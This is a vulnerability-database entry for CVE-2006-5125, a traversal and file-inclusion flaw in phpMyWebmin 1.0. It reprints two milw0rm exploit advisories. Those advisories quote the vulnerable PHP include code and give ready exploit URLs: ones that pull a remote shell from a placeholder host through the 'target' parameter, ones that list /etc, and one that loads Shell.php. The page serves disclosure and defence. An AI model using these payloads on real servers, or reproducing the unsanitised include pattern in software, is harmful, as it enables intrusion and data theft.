CVE-2006-5125
published 2006-10-03CVE-2006-5125: Directory traversal vulnerability in window.php, possibly used by home.php, in Joshua Muheim phpMyWebmin 1.0 allows remote attackers to obtain sensitive…
PriorityP425medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.65%
88.2th percentile
Directory traversal vulnerability in window.php, possibly used by home.php, in Joshua Muheim phpMyWebmin 1.0 allows remote attackers to obtain sensitive information via a directory name in the target parameter, which triggers a directory listing through the opendir function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joshua_muheim | phpmywebmin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpMyWebmin 1.0 - 'target' Remote File Inclusion
exploitdb·2006-09-30
CVE-2006-5181 phpMyWebmin 1.0 - 'target' Remote File Inclusion
phpMyWebmin 1.0 - 'target' Remote File Inclusion
---
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
Discovered by XORON(turkish hacker)
URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip
Vuln. Code: include("$target/$folder/preferences.php");
Exploit: /change_preferences2.php?target=http://SH3LL?
/create_file.php?target=http://SH3LL?
/upload_local.php?target=http://SH3LL?
/upload_multi.php?target=http://SH3LL?
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)
# milw0rm.com [2006-09-30]
Exploit-DB
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion
exploitdb·2006-09-28
CVE-2006-5125 phpMyWebmin 1.0 - 'window.php' Remote File Inclusion
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion
---
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: [email protected]
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable File:window.php
$ordner = opendir("$target");
?>
and
include("$target/preferences.php");
if($action != "")
{
include("$action.php");
?>
Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
# milw0rm.com [2006-09-28]
No writeups or analysis indexed.
http://kernel-32.blogspot.com/2006/09/php-mywebmin-10-remote-file-include.htmlhttp://secunia.com/advisories/22178http://www.securityfocus.com/bid/20264http://www.vupen.com/english/advisories/2006/3846https://exchange.xforce.ibmcloud.com/vulnerabilities/29259https://www.exploit-db.com/exploits/2451http://kernel-32.blogspot.com/2006/09/php-mywebmin-10-remote-file-include.htmlhttp://secunia.com/advisories/22178http://www.securityfocus.com/bid/20264http://www.vupen.com/english/advisories/2006/3846https://exchange.xforce.ibmcloud.com/vulnerabilities/29259https://www.exploit-db.com/exploits/2451
2006-10-03
Published